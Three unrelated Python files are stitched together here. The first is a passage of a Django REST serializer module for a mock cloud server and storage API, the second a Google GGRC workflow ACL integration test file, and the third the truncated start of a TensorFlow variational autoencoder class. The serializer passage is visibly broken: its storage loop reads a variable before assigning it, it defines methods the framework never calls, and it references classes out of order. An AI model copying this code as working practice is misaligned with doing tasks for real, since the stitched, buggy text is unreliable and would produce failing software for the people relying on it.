"""list serializer"""
def to_representation(self, instance):
data = super(ListServerSerializer, self).to_representation(instance)
data = {'storage_devices': {'storage_device': data}}
return data
@property
def data(self):
super(ListStorageSerializer, self).data
return self._data
class ServerStorageSerializer(serializers.ModelSerializer):
part_of_plan = ao_fields.YesNoField(required=False)
server = serializers.PrimaryKeyRelatedField(queryset=models.Server.objects.all(), required=False)
class Meta:
model = models.Storage
fields = '__all__'
list_serializer_class = ListStorageSerializer
def to_internal_data(self, data):
data = data['storage_device']
return super(ServerStorageSerializer, self).to_internal_data(data)
class ServerIpsSerializer(serializers.Serializer):
access = fields.ChoiceField(choices=models.IP_ACCESSES)
family = fields.ChoiceField(choices=models.IP_FAMILIES, default='ipv4')
def create(self, *args, **kwargs):
pass
class ServerIpSerializer(serializers.Serializer):
ip_address = ServerIpsSerializer(many=True)
def create(self, *args, **kwargs):
pass
class SshKeyListSerializer(serializers.Serializer):
ssh_key = ao_fields.SshKeyListField()
def create(self, *args, **kwargs):
pass
class ServerLoginUserSerializer(serializers.Serializer):
create_password = ao_fields.YesNoField(default='<PASSWORD>')
username = fields.CharField(default='root')
ssh_keys = SshKeyListSerializer()
def create(self, *args, **kwargs):
pass
STORAGE_ACTIONS = ('create', 'clone', 'attach')
STORAGE_TYPES = ('disk', 'cdrom')
class ServerStorageDeviceSerializer(serializers.Serializer):
action = fields.ChoiceField(choices=STORAGE_ACTIONS)
address = fields.CharField(required=False)
size = fields.IntegerField(min_value=10, max_value=1024)
tier = fields.ChoiceField(choices=models.STORAGE_TIERS, default='hdd', required=False)
title = fields.CharField(required=False)
type = fields.ChoiceField(choices=STORAGE_TYPES, default='disk', required=False)
storage = fields.CharField()
def validate_storage(self, value):
exists = models.Storage.objects.filter(uuid=value).exists()
if exists:
pass
elif not exists and settings.CREATION_LEVEL == 0:
value = factories.StorageFactory(uuid=value).uuid
return value
def create(self, *args, **kwargs):
pass
class ServerStorageDeviceListSerializer(serializers.Serializer):
storage_device = ServerStorageDeviceSerializer(many=True)
def create(self, *args, **kwargs):
pass
class ListServerSerializer(serializers.ListSerializer):
"""list serializer"""
def to_representation(self, instance):
data = super(ListServerSerializer, self).to_representation(instance)
data = {'servers': {'server': data}}
return data
@property
def data(self):
super(ListServerSerializer, self).data
return self._data
PASSWORD_DELIVERIES = ('none', 'email', 'sms')
class ServerSerializer(serializers.ModelSerializer):
firewall = ao_fields.OnOffField(required=False)
timezone = fields.CharField(required=False)
ip_addresses = ServerIpSerializer(required=False)
login_user = ServerLoginUserSerializer(required=False)
storage_devices = ServerStorageDeviceListSerializer(required=False)
password_delivery = fields.ChoiceField(choices=PASSWORD_DELIVERIES, default='none', required=False)
class Meta:
model = models.Server
exclude = ('host', 'state')
def validate_plan(self, value):
if value == 'custom':
return None
exists = models.Plan.objects.filter(name=value).exists()
if exists:
pass
elif not exists and settings.CREATION_LEVEL == 0:
value = factories.PlanFactory(name=value)
else:
raise serializers.ValidationError('')
return value
def validate_zone(self, value):
exists = models.Zone.objects.filter(id=value).exists()
if exists:
pass
elif not exists and settings.CREATION_LEVEL == 0:
value = factories.ZoneFactory(id=value)
else:
raise serializers.ValidationError('')
return value
class ServerListSerializer(ServerSerializer):
"""ListView Serializer"""
class Meta:
model = models.Server
exclude = ('account',)
list_serializer_class = ListServerSerializer
STOP_TYPES = ('soft', 'hard')
class StopServerSerializer(serializers.Serializer):
stop_type = fields.ChoiceField(STOP_TYPES, required=False, default='soft')
timeout = fields.IntegerField(min_value=1, max_value=600, required=False, default='1')
class PostStopServerSerializer(serializers.Serializer):
stop_server = StopServerSerializer()
TIMEOUT_ACTIONS = ('destroy', 'ignore')
class RestartServerSerializer(StopServerSerializer):
timeout_action = fields.ChoiceField(TIMEOUT_ACTIONS, required=False, default='ignore')
class PostRestartServerSerializer(serializers.Serializer):
restart_server = RestartServerSerializer()
class ServerListIpAddressesSerializer(serializers.ListSerializer):
def to_representation(self, instance):
data = super(ServerListIpAddressesSerializer, self).to_representation(instance)
return {'ip_address': data}
class ServerIpAddressesSerializer(IpAddressSerializer):
class Meta:
model = models.IpAddress
fields = ('access', 'address', 'family')
list_serializer_class = ServerListIpAddressesSerializer
def to_internal_value(self, data):
data = data['ip_address']
return super(ServerIpAddressesSerializer, self).to_internal_value(data)
class ServerListStorageSerializer(serializers.ListSerializer):
def to_representation(self, instance):
data = super(ServerListStorageSerializer, self).to_representation(instance)
return {'storage_device': data}
def to_internal_value(self, data):
data = data['storage_device']
return super(ServerListStorageSerializer, self).to_internal_value(data)
class ServerStoragesSerializer(ServerStorageSerializer):
storage = fields.UUIDField(source='uuid')
storage_size = fields.IntegerField(source='size')
storage_title = fields.CharField(source='title')
class Meta:
model = models.Storage
list_serializer_class = ServerListStorageSerializer
fields = ('part_of_plan', 'address', 'storage', 'storage_size', 'storage_title', 'type')
class ServerDetailSerializer(ServerSerializer):
ip_addresses = ServerIpAddressesSerializer(source='ipaddress_set', many=True, required=False)
storage_devices = ServerStoragesSerializer(source='storage_set', many=True, required=False)
class Meta:
model = models.Server
fields = (
'uuid',
'title',
'hostname',
'licence',
'plan',
'core_number',
'memory_amount',
'state',
'zone',
'firewall',
'boot_order',
'host',
'nic_model',
'timezone',
'ip_addresses',
'storage_devices',
)
def to_representation(self, instance):
data = super(ServerDetailSerializer, self).to_representation(instance)
data = {'server': data}
return data
def to_internal_value(self, data):
data = data['server']
return super(ServerDetailSerializer, self).to_internal_value(data)
class PostServerStorageSerializer(ServerStorageSerializer):
class Meta:
model = models.Storage
list_serializer_class = ListStorageSerializer
fields = (
# 'action',
'address',
'size',
# 'storage',
'tier',
'title',
'type',
)
class PostServerSerializer(ServerDetailSerializer):
storage_devices = PostServerStorageSerializer(many=True, required=False)
def _clone_storage(self, server, storage_device):
base_storage = models.Storage.objects.filter(uuid=storage_device['storage']).first()
if settings.STORAGE_ACTION_LEVEL == 0:
if base_storage is None:
base_storage = factories.StorageFactory(
access='private',
type='disk',
part_of_plan=False,
zone=server.zone,
account=server.account)
base_storage.uuid = None
base_storage.server = server
base_storage.state = 'maintenance'
base_storage.save()
storage = base_storage
return storage
def _create_storage(self, server, storage_device):
storage = models.Storage.objects.create(
title=storage_device['title'],
access='private',
type=storage_device.get('type', 'disk'),
tier=storage_device['tier'],
size=storage_device['size'],
part_of_plan=False,
zone=server.zone,
server=server,
address=storage_device.get('address', ''),
account=server.account)
return storage
def _attach_storage(self, server, storage_device):
storage = models.Storage.objects.filter(uuid=storage_device['storage']).first()
if storage is None and settings.STORAGE_ACTION_LEVEL == 0:
storage = factories.StorageFactory(
access='private',
type='disk',
part_of_plan=False,
zone=server.zone,
account=server.account)
return storage
def create(self, *args, **kwargs):
server_data = self.validated_data.copy()
login_user = server_data.pop('login_user', None)
storage_devices = server_data.pop('storage_devices', None)
password_delivery = server_data.pop('password_delivery', None)
# Server
if settings.SERVER_ACTION_LEVEL == 0:
server = factories.ServerFactory(
account=self.account,
state='started',
**server_data)
else:
server = models.Server.objects.create(
account=self.account,
**server_data)
# Storages
for storage_device in storage_devices:
if storage['action'] == 'clone':
storage = self._clone_storage(server, storage_device)
elif storage['action'] == 'create':
storage = self._create_storage(server, storage_device)
elif storage['action'] == 'attach':
storage = self._attach_storage(server, storage_device)
# IPs
return server
class StorageSerializer(serializers.ModelSerializer):
"""Base Storage Serializer"""
server = serializers.PrimaryKeyRelatedField(queryset=models.Server.objects.all(), required=False)
backups = serializers.PrimaryKeyRelatedField(source='storage_set', read_only=True)
class Meta:
model = models.Storage
exclude = (
'backup_rule_interval',
'backup_rule_time',
'backup_rule_retention',
'backup_of',
'favorite',
'account',
'server',
'address',
'part_of_plan',
)
def to_internal_data(self, data):
data = data['storage']
backup_rule = data.pop('backup_rules', None)
if backup_rule:
data.update(backup_rule_interval=backup_rule['interval'],
backup_rule_time=backup_rule['time'],
backup_rule_retention=backup_rule['retention'])
return super(StorageSerializer, self).to_internal_data(data)
def to_representation(self, instance, detail=True):
data = super(StorageSerializer, self).to_representation(instance)
data.update(uuid=str(instance.uuid),
state=instance.state)
if detail:
# Backup rule
if instance.backup_rule_time and instance.type == 'disk':
backup_rule = {
'interval': instance.backup_rule_interval,
'time': instance.backup_rule_time,
'retention': instance.backup_rule_retention,
}
else:
backup_rule = ''
data.pop('backup_rule_interval', None)
data.pop('backup_rule_time', None)
data.pop('backup_rule_retention', None)
data['backup_rule'] = backup_rule
# Backup
backups = data.pop('backups', [])
if backups:
backups = backups.values_list('uuid', flat=True)
data['backups'] = {'backups': backups}
# Server
data['servers'] = {'server': []}
server_uuid = data.pop('server', None)
if server_uuid is not None:
data['servers']['server'] = [server_uuid]
# Format
data = {'storage': data}
return data
class ListStorageSerializer(serializers.ListSerializer):
def to_representation(self, instance):
data = super(ListStorageSerializer, self).to_representation(instance)
data = {'storages': {'storage': data}}
return data
@property
def data(self):
super(ListStorageSerializer, self).data
return self._data
class StorageListSerializer(StorageSerializer):
"""List Storage Serializer"""
class Meta:
model = models.Storage
list_serializer_class = ListStorageSerializer
fields = (
'access',
'license',
'size',
'state',
'tier',
'title',
'type',
'uuid',
'zone',
)
def to_representation(self, instance):
data = super(StorageListSerializer, self).to_representation(instance, False)
return data
class StorageCreateSerializer(StorageSerializer):
class Meta:
model = models.Storage
fields = (
'size',
'tier',
'title',
'zone',
'backup_rule_interval',
'backup_rule_time',
'backup_rule_retention',
)
def validate_empty_values(self, data):
data = data.get('storage')
return super(StorageCreateSerializer, self).validate_empty_values(data)
def save(self, *args, **kwargs):
storage_data = self.validated_data
storage_data.update(account=self.account,
state='maintenance',
type='disk')
if settings.STORAGE_ACTION_LEVEL == 0:
self.instance = factories.StorageFactory(**storage_data)
else:
# TODO: Check
self.instance = super(StorageCreateSerializer, self).save(*args, **kwargs)
| |
# Copyright (C) 2019 Google Inc.
# Licensed under http://www.apache.org/licenses/LICENSE-2.0 <see LICENSE file>
"""Tests Workflow related API calls."""
import datetime
import unittest
import ddt
import freezegun
from ggrc.models import all_models
from integration.ggrc import TestCase
from integration.ggrc.api_helper import Api
from integration.ggrc.access_control import acl_helper
from integration.ggrc.models import factories
from integration.ggrc_workflows import generator as wf_generator
from integration.ggrc_workflows.models import factories as wf_factories
WF_ROLES = {
role.name: role.id
for role in all_models.AccessControlRole.eager_query().filter(
all_models.AccessControlRole.object_type == "Workflow").all()
}
@ddt.ddt # pylint: disable=too-many-public-methods
class TestWorkflowsApiPost(TestCase):
"""Test class for ggrc workflow api post action."""
def setUp(self):
super(TestWorkflowsApiPost, self).setUp()
self.api = Api()
self.generator = wf_generator.WorkflowsGenerator()
self.wf_admin_id = all_models.Person.query.first().id
with factories.single_commit():
self.people_ids = [factories.PersonFactory().id for _ in xrange(6)]
def tearDown(self):
pass
def _delete_and_check_related_acl(self, related_model, exp_acl_count,
is_deleted):
"""Delete related model and check remaining ACL count.
Args:
related_model: related model class
exp_acl_count: expected related ACL count after delete operation
is_deleted: is related object already deleted
"""
if is_deleted:
related_count = related_model.query.count()
self.assertEqual(related_count, 0)
else:
related = related_model.query.one()
response = self.api.delete(related)
self.assert200(response)
related_acl_count = all_models.AccessControlList.query.filter(
all_models.AccessControlList.object_type == related_model.__name__
).count()
self.assertEqual(related_acl_count, 0)
bg_task_count = all_models.AccessControlList.query.filter(
all_models.AccessControlList.object_type == "BackgroundTask"
).count()
all_acl_count = all_models.AccessControlList.query.count()
self.assertEqual(all_acl_count - bg_task_count, exp_acl_count)
def test_acl_on_object_deletion(self):
"""Test related ACL records removed on related object delete"""
self._create_propagation_acl_test_data()
acl_count = all_models.AccessControlList.query.count()
self.assertNotEqual(acl_count, 0)
admin = all_models.Person.query.get(1)
self.api.set_user(admin)
related_models = (
(all_models.CycleTaskEntry, 26, False),
(all_models.TaskGroup, 16, False),
(all_models.TaskGroupTask, 16, True),
(all_models.Cycle, 2, False),
(all_models.CycleTaskGroup, 2, True),
(all_models.CycleTaskGroupObjectTask, 2, True),
)
for related_model, acl_count, is_deleted in related_models:
self._delete_and_check_related_acl(related_model, acl_count, is_deleted)
def test_acl_on_workflow_delete(self):
"""Test related ACL records removed on Workflow delete"""
self._create_propagation_acl_test_data()
acl_count = all_models.AccessControlList.query.count()
self.assertNotEqual(acl_count, 0)
admin = all_models.Person.query.get(1)
self.api.set_user(admin)
workflow = all_models.Workflow.query.one()
response = self.api.delete(workflow)
self.assert200(response)
acl_count = all_models.AccessControlList.query.count()
bg_acl_count = all_models.AccessControlList.query.filter(
all_models.AccessControlList.object_type == "BackgroundTask"
).count()
self.assertEqual(acl_count, bg_acl_count)
def test_acl_for_new_related_object(self):
"""Test Workflow ACL propagation for new related objects."""
data = self.get_workflow_dict()
acl_map = {
self.people_ids[0]: WF_ROLES['Admin'],
self.people_ids[1]: WF_ROLES['Workflow Member'],
}
data["workflow"]["access_control_list"] = acl_helper.get_acl_list(acl_map)
data["workflow"]["unit"] = "week"
data["workflow"]["repeat_every"] = 1
response = self.api.post(all_models.Workflow, data)
self.assertEqual(response.status_code, 201)
data = self.get_task_group_dict(response.json["workflow"])
data["task_group"]["contact"]["id"] = self.people_ids[2]
data["task_group"]["contact"]["href"] = "/api/people/{}".format(
self.people_ids[2])
response = self.api.post(all_models.TaskGroup, data)
self.assertEqual(response.status_code, 201)
task_group = all_models.TaskGroup.eager_query().one()
data = self.get_task_dict(task_group)
data["task_group_task"]["start_date"] = "2018-01-04"
data["task_group_task"]["end_date"] = "2018-01-05"
response = self.api.post(all_models.TaskGroupTask, data)
self.assertEqual(response.status_code, 201)
workflow = all_models.Workflow.query.one()
with freezegun.freeze_time("2018-01-05"): # Generate 1 cycle
self.generator.activate_workflow(workflow)
cycle_task = all_models.CycleTaskGroupObjectTask.query.one()
cycle = all_models.Cycle.query.one()
data = self.get_comment_dict(cycle_task, cycle)
response = self.api.post(all_models.CycleTaskEntry, data)
self.assertEqual(response.status_code, 201)
self._check_propagated_acl(2)
@ddt.data('Admin', 'Workflow Member')
def test_tg_assignee(self, role_name):
"""Test TaskGroup assignee already has {0} role."""
data = self.get_workflow_dict()
init_acl = {
self.people_ids[0]: WF_ROLES['Admin'],
self.people_ids[1]: WF_ROLES[role_name],
}
data['workflow']['access_control_list'] = acl_helper.get_acl_list(init_acl)
response = self.api.post(all_models.Workflow, data)
self.assertEqual(response.status_code, 201)
data = self.get_task_group_dict(response.json["workflow"])
data["task_group"]["contact"]["id"] = self.people_ids[1]
data["task_group"]["contact"]["href"] = "/api/people/{}".format(
self.people_ids[1])
response = self.api.post(all_models.TaskGroup, data)
self.assertEqual(response.status_code, 201)
workflow = all_models.Workflow.query.one()
task_group = all_models.TaskGroup.query.one()
ac_people = all_models.AccessControlPerson.query.filter(
all_models.AccessControlPerson.person_id == task_group.contact_id,
).all()
self.assertEqual(len(ac_people), 1)
actual = {
(acp.ac_list.object_type, acp.ac_list.object_id)
for acp in ac_people
}
self.assertIn((workflow.type, workflow.id), actual)
self.assertNotIn((task_group.type, task_group.id), actual)
def test_task_group_assignee_gets_workflow_member(self): # noqa pylint: disable=invalid-name
"""Test TaskGroup assignee gets WorkflowMember role."""
data = self.get_workflow_dict()
init_acl = {
self.people_ids[0]: WF_ROLES['Admin'],
self.people_ids[1]: WF_ROLES['Workflow Member'],
}
data['workflow']['access_control_list'] = acl_helper.get_acl_list(init_acl)
response = self.api.post(all_models.Workflow, data)
self.assertEqual(response.status_code, 201)
data = self.get_task_group_dict(response.json["workflow"])
data["task_group"]["contact"]["id"] = self.people_ids[2]
data["task_group"]["contact"]["href"] = "/api/people/{}".format(
self.people_ids[2])
response = self.api.post(all_models.TaskGroup, data)
self.assertEqual(response.status_code, 201)
workflow = all_models.Workflow.query.one()
wf_members = [
acp.person.id
for acp in
workflow.acr_name_acl_map["Workflow Member"].access_control_people
]
self.assertIn(self.people_ids[2], wf_members)
def _create_propagation_acl_test_data(self): # noqa pylint: disable=invalid-name
"""Create objects for Workflow ACL propagation test."""
with freezegun.freeze_time("2017-08-9"):
with factories.single_commit():
workflow = wf_factories.WorkflowFactory(
title='wf1',
unit=all_models.Workflow.WEEK_UNIT,
is_verification_needed=True,
repeat_every=1)
wf_factories.TaskGroupTaskFactory(
title='tgt1',
task_group=wf_factories.TaskGroupFactory(
title='tg1',
context=factories.ContextFactory(),
workflow=workflow
),
# One cycle should be created
start_date=datetime.date(2017, 8, 3),
end_date=datetime.date(2017, 8, 7)
)
self.generator.activate_workflow(workflow)
cycle = all_models.Cycle.query.one()
cycle_task = all_models.CycleTaskGroupObjectTask.query.one()
wf_factories.CycleTaskEntryFactory(
cycle=cycle,
cycle_task_group_object_task=cycle_task,
description="Cycle task comment",
)
workflow = all_models.Workflow.query.one()
acl_map = {
self.people_ids[0]: WF_ROLES['Admin'],
self.people_ids[1]: WF_ROLES['Workflow Member'],
self.people_ids[2]: WF_ROLES['Workflow Member'],
}
put_params = {'access_control_list': acl_helper.get_acl_list(acl_map)}
response = self.api.put(workflow, put_params)
self.assert200(response)
def _check_propagated_acl(self, roles_count):
"""Check Workflow propagated ACL records.
Args:
roles_count: roles' count created in test
"""
related_objects = (
(all_models.TaskGroup.query.one().id, all_models.TaskGroup.__name__),
(all_models.TaskGroupTask.query.one().id,
all_models.TaskGroupTask.__name__),
(all_models.Cycle.query.one().id, all_models.Cycle.__name__),
(all_models.CycleTaskGroup.query.one().id,
all_models.CycleTaskGroup.__name__),
(all_models.CycleTaskGroupObjectTask.query.one().id,
all_models.CycleTaskGroupObjectTask.__name__),
)
related_count = len(related_objects) * 2 # *2 is for relationships
all_acls = all_models.AccessControlList.query.filter(
all_models.AccessControlList.parent_id_nn != 0
).count()
self.assertEqual(
all_acls,
roles_count * related_count
)
def test_assign_workflow_acl(self):
"""Test propagation Workflow ACL roles on Workflow's update ACL records."""
self._create_propagation_acl_test_data()
self._check_propagated_acl(2)
def test_unassign_workflow_acl(self):
"""Test propagation Workflow ACL roles on person unassigned."""
self._create_propagation_acl_test_data()
with freezegun.freeze_time("2017-08-9"):
workflow = all_models.Workflow.query.one()
acl_map = {
self.people_ids[0]: WF_ROLES['Admin'],
self.people_ids[1]: WF_ROLES['Workflow Member'],
}
put_params = {'access_control_list': acl_helper.get_acl_list(acl_map)}
response = self.api.put(workflow, put_params)
self.assert200(response)
self._check_propagated_acl(2)
def test_post_workflow_with_acl(self):
"""Test PUT workflow with ACL."""
data = self.get_workflow_dict()
exp_res = {
self.wf_admin_id: WF_ROLES['Admin'],
self.people_ids[0]: WF_ROLES['Admin'],
self.people_ids[1]: WF_ROLES['Workflow Member'],
self.people_ids[2]: WF_ROLES['Workflow Member'],
self.people_ids[3]: WF_ROLES['Workflow Member']
}
data['workflow']['access_control_list'] = acl_helper.get_acl_list(exp_res)
response = self.api.post(all_models.Workflow, data)
self.assertEqual(response.status_code, 201)
workflow = all_models.Workflow.eager_query().one()
act_res = {person.id: acl.ac_role_id
for person, acl in workflow.access_control_list}
self.assertDictEqual(exp_res, act_res)
def test_update_workflow_acl_people(self):
"""Test PUT workflow with updated ACL."""
data = self.get_workflow_dict()
init_map = {
self.wf_admin_id: WF_ROLES['Admin'],
self.people_ids[0]: WF_ROLES['Workflow Member'],
}
data['workflow']['access_control_list'] = acl_helper.get_acl_list(init_map)
response = self.api.post(all_models.Workflow, data)
self.assertEqual(response.status_code, 201)
exp_res = {
self.people_ids[0]: WF_ROLES['Admin'],
self.people_ids[1]: WF_ROLES['Admin'],
self.people_ids[2]: WF_ROLES['Workflow Member'],
self.people_ids[3]: WF_ROLES['Workflow Member'],
self.people_ids[4]: WF_ROLES['Workflow Member']
}
workflow = all_models.Workflow.eager_query().one()
put_params = {'access_control_list': acl_helper.get_acl_list(exp_res)}
response = self.api.put(workflow, put_params)
self.assert200(response)
workflow = all_models.Workflow.eager_query().one()
act_res = {person.id: acl.ac_role_id
for person, acl in workflow.access_control_list}
self.assertDictEqual(exp_res, act_res)
def test_send_invalid_data(self):
"""Test send invalid data on Workflow post."""
data = self.get_workflow_dict()
del data["workflow"]["title"]
del data["workflow"]["context"]
response = self.api.post(all_models.Workflow, data)
self.assert400(response)
# TODO: check why response.json["message"] is empty
def test_create_one_time_workflows(self):
"""Test simple create one time Workflow over api."""
data = self.get_workflow_dict()
response = self.api.post(all_models.Workflow, data)
self.assertEqual(response.status_code, 201)
def test_create_weekly_workflow(self):
"""Test create valid weekly wf"""
data = self.get_workflow_dict()
data["workflow"]["repeat_every"] = 7
data["workflow"]["unit"] = "day"
data["workflow"]["title"] = "Weekly"
response = self.api.post(all_models.Workflow, data)
self.assertEqual(response.status_code, 201)
def test_create_annually_workflow(self):
"""Test create valid annual wf"""
data = self.get_workflow_dict()
data["workflow"]["repeat_every"] = 12
data["workflow"]["unit"] = "month"
data["workflow"]["title"] = "Annually"
response = self.api.post(all_models.Workflow, data)
self.assertEqual(response.status_code, 201)
@ddt.data("wrong value", 0, -4)
def test_create_wrong_repeat_every_workflow(self, value): # noqa pylint: disable=invalid-name
"""Test case for invalid repeat_every value"""
data = self.get_workflow_dict()
data["workflow"]["repeat_every"] = value
data["workflow"]["unit"] = "month"
data["workflow"]["title"] = "Wrong wf"
response = self.api.post(all_models.Workflow, data)
self.assertEqual(response.status_code, 400)
def test_create_wrong_unit_workflow(self):
"""Test case for invalid unit value"""
data = self.get_workflow_dict()
data["workflow"]["repeat_every"] = 12
data["workflow"]["unit"] = "wrong value"
data["workflow"]["title"] = "Wrong wf"
response = self.api.post(all_models.Workflow, data)
self.assertEqual(response.status_code, 400)
def test_create_task_group(self):
"""Test create task group over api."""
wf_data = self.get_workflow_dict()
wf_data["workflow"]["title"] = "Create_task_group"
wf_response = self.api.post(all_models.Workflow, wf_data)
data = self.get_task_group_dict(wf_response.json["workflow"])
response = self.api.post(all_models.TaskGroup, data)
self.assertEqual(response.status_code, 201)
@staticmethod
def get_workflow_dict():
return {
"workflow": {
"custom_attribute_definitions": [],
"custom_attributes": {},
"title": "One_time",
"description": "",
"unit": None,
"repeat_every": None,
"notify_on_change": False,
"task_group_title": "Task Group 1",
"notify_custom_message": "",
"is_verification_needed": True,
"context": None,
}
}
def get_task_group_dict(self, workflow):
return {
"task_group": {
"custom_attribute_definitions": [],
"custom_attributes": {},
"_transient": {},
"contact": {
"id": self.wf_admin_id,
"href": "/api/people/{}".format(self.wf_admin_id),
"type": "Person"
},
"workflow": {
"id": workflow["id"],
"href": "/api/workflows/%d" % workflow["id"],
"type": "Workflow"
},
"context": {
"id": workflow["context"]["id"],
"href": "/api/contexts/%d" % workflow["context"]["id"],
"type": "Context"
},
"modal_title": "Create Task Group",
"title": "Create_task_group",
"description": "",
}
}
def get_task_dict(self, task_group):
return {
"task_group_task": {
"start_date": "2017-12-25",
"end_date": "2017-12-31",
"custom_attributes": {},
"contact": {
"id": self.wf_admin_id,
"href": "/api/people/{}".format(self.wf_admin_id),
"type": "Person"
},
"task_group": {
"id": task_group.id,
"href": "/api/task_groups/{}".format(task_group.id),
"type": "TaskGroup"
},
"context": {
"id": task_group.context_id,
"href": "/api/contexts/{}".format(task_group.context_id),
"type": "Context"
},
"title": "Create_task",
"task_type": "text",
"description": ""
}
}
@staticmethod
def get_comment_dict(cycle_task, cycle):
return {
"cycle_task_entry": {
"custom_attributes": {},
"cycle_task_group_object_task": {
"id": cycle_task.id,
"href": "/api/cycle_task_group_object_tasks/{}".format(
cycle_task.id),
"type": "CycleTaskGroupObjectTask"
},
"cycle": {
"id": cycle.id,
"href": "/api/cycles/{}".format(cycle.id),
"type": "Cycle"
},
"context": {
"id": cycle.context_id,
"href": "/api/contexts/{}".format(cycle.context_id),
"type": "Context"
},
"is_declining_review": "",
"description": "CT comment"
}
}
@ddt.data({},
{"repeat_every": 5, "unit": "month"})
def test_repeat_multiplier_field(self, data):
"""Check repeat_multiplier is set to 0 after wf creation."""
with factories.single_commit():
workflow = wf_factories.WorkflowFactory(**data)
workflow_id = workflow.id
self.assertEqual(
0, all_models.Workflow.query.get(workflow_id).repeat_multiplier)
# TODO: Unskip in the patch 2
@unittest.skip("Will be activated in patch 2")
def test_change_to_one_time_wf(self):
"""Check repeat_every and unit can be set to Null only together."""
with factories.single_commit():
workflow = wf_factories.WorkflowFactory(repeat_every=12,
unit="day")
resp = self.api.put(workflow, {"repeat_every": None,
"unit": None})
self.assert200(resp)
@ddt.data({"repeat_every": 5},
{"unit": "month"})
def test_change_repeat_every(self, data):
"""Check repeat_every or unit can not be changed once set."""
with factories.single_commit():
workflow = wf_factories.WorkflowFactory()
resp = self.api.put(workflow, data)
self.assert400(resp)
def test_not_change_to_one_time_wf(self):
"""Check repeat_every or unit can't be set to Null separately.
This test | |
<filename>models/VAE.py<gh_stars>1-10
#!/usr/bin/env python
"""Variational Autoencoder class
@author: <NAME>, June 2017
VAE class implements a variational autoencoder
"""
from __future__ import print_function
from __future__ import division
import os
import numpy as np
import tensorflow as tf
import sys
sys.path.append('..')
import utils.exceptions as exc
class VAE(object):
"""Variational Autoencoder class
Attributes:
layers_encoder (list of ints): size of each layer in encoder, excluding
input layer
input_size (int): size of input
layer_latent (int): size of latent layer
layers_decoder (list of ints): size of each layer in decoder, including
output layer
num_lvs (int): size of latent layer
num_layers_enc (int): number of layers in encoder, including input
layer
num_layers_dec (int): number of layers in decoder, including latent
layer and output layer
act_func (str): activation function for network layers
weights_enc (list of tf.Variable): weights of the encoding network
biases_enc (list of tf.Variable): biases of the encoding network
weights_mean (tf.Variable): weights from encoding network to latent
variable distribution mean
biases_mean (tf.Variable): biases from encoding network to latent
variable distribution mean
weights_log_var (tf.Variable): weights from encoding network to log of
latent variable distribution variance
biases_log_var (tf.Variable): biases from encoding network to log of
latent variable distribution variance
weights_dec (list of tf.Variable): weights of the decoding network
biases_dec (list of tf.Variable): biases of the decoding network
x (tf placeholder): ph for input to model
z_mean (tf op): mean value for each latent variable
z_log_var (tf op): log of the variance for each latent variable
z (tf op): sample value of latent variable
eps (tf placeholder): ph for N(0,1) input to stochastic layer
x_recon (tf op): reconstructed input values
cost (tf op): evaluates the cost function of the network
learning_rate (float): global learning rate used by gradient descent
optimizers
train_step (tf op): evaluates one training step using the specified
cost function and learning algorithm
graph (tf.Graph): dataflow graph for the network
saver (tf.train.Saver): for saving and restoring variables
merge_summaries (tf op): op that merges all summary ops
init (tf op): op that initializes global variables in graph
"""
def __init__(
self,
layers_encoder=None,
layer_latent=None,
layers_decoder=None,
act_func='relu',
learning_rate=1e-3):
"""Constructor for VAE class
Args:
layers_encoder (list of ints): size of each layer in encoder,
including input layer
layer_latent (int): size of latent layer
layers_decoder (list of ints): size of each layer in decoder,
including output layer
act_func (str): activation function for network layers
['relu'] | 'sigmoid' | 'tanh' | 'linear' | 'softplus' | 'elu'
learning_rate (scalar): global learning rate for gradient descent
methods
Raises:
InputError if layers_encoder is not specified
InputError if layers_latent is not specified
InputError if layers_decoder is not specified
InputError if act_func is not a valid string
"""
# input checking
if layers_encoder is None:
raise exc.InputError('Must specify layer sizes for encoder')
if layer_latent is None:
raise exc.InputError('Must specify number of latent dimensions')
if layers_decoder is None:
raise exc.InputError('Must specify layer sizes for decoder')
self.input_size = layers_encoder[0]
self.layers_encoder = layers_encoder[1:]
self.layer_latent = layer_latent
self.layers_decoder = layers_decoder
if act_func == 'relu':
self.act_func = tf.nn.relu
elif act_func == 'sigmoid':
self.act_func = tf.sigmoid
elif act_func == 'tanh':
self.act_func = tf.tanh
elif act_func == 'linear':
self.act_func = tf.identity
elif act_func == 'softplus':
self.act_func = tf.nn.softplus
elif act_func == 'elu':
self.act_func = tf.nn.elu
else:
raise exc.InputError('Invalid activation function')
self.learning_rate = learning_rate
# define useful constants
self.num_lvs = self.layer_latent
self.num_layers_enc = len(self.layers_encoder)
self.num_layers_dec = len(self.layers_decoder)
# for saving and restoring models
self.graph = tf.Graph() # must be initialized before graph creation
# build model graph
with self.graph.as_default():
# define pipeline for feeding data into model
with tf.variable_scope('data'):
self._initialize_data_pipeline()
# initialize weights and create encoder model
with tf.variable_scope('encoder'):
self._define_recognition_network()
# initialize weights and create decoder model
with tf.variable_scope('decoder'):
self._define_generator_network()
# define loss function
with tf.variable_scope('loss'):
self._define_loss()
# define optimizer
with tf.variable_scope('optimizer'):
self._define_optimizer()
# add additional ops
# for saving and restoring models
self.saver = tf.train.Saver() # must be init after var creation
# collect all summaries into a single op
self.merge_summaries = tf.summary.merge_all()
# add variable initialization op to graph
self.init = tf.global_variables_initializer()
def _initialize_data_pipeline(self):
"""Create placeholders for input and random values"""
self.x = tf.placeholder(
dtype=tf.float32,
shape=[None, self.input_size],
name='input_ph')
self.eps = tf.placeholder(
dtype=tf.float32,
shape=[None, self.num_lvs],
name='rand_ph')
def _define_recognition_network(self):
"""
Create a recognition network to transform inputs into its latent
representation
"""
# push data through the encoding function to determine mean and std
# of latent vars
self.weights_enc = []
self.biases_enc = []
z_enc = [self.x]
for layer in range(self.num_layers_enc):
with tf.variable_scope(str('layer_%01i' % layer)):
# initialize weights
if layer == 0:
in_size = self.input_size
else:
in_size = self.layers_encoder[layer - 1]
out_size = self.layers_encoder[layer]
self.weights_enc.append(tf.get_variable(
shape=[in_size, out_size],
name='weights',
initializer=tf.truncated_normal_initializer(stddev=0.1)))
# initialize biases
self.biases_enc.append(tf.get_variable(
initializer=tf.zeros(shape=[1, out_size]),
name='biases'))
# calculate layer activations
pre = tf.add(
tf.matmul(z_enc[layer], self.weights_enc[layer]),
self.biases_enc[layer])
post = self.act_func(pre)
z_enc.append(post)
# save summaries of layer activations
tf.summary.histogram('pre_act', pre)
tf.summary.histogram('post_act', post)
with tf.variable_scope('latent_layer'):
with tf.variable_scope('means'):
# initialize weights/biases for means of stochastic layer
self.weights_mean = tf.get_variable(
shape=[self.layers_encoder[-1], self.num_lvs],
name='weights',
